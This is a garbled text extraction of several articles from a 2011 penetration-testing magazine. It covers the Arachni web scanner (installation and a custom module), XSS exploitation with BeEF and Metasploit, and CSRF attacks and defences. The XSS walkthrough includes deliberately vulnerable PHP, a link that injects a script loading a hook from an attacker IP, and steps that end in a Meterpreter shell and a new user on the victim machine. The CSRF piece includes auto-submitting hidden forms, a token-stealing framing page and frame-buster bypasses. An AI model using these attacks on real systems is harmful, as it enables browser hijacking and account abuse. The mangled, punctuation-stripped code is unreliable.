Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
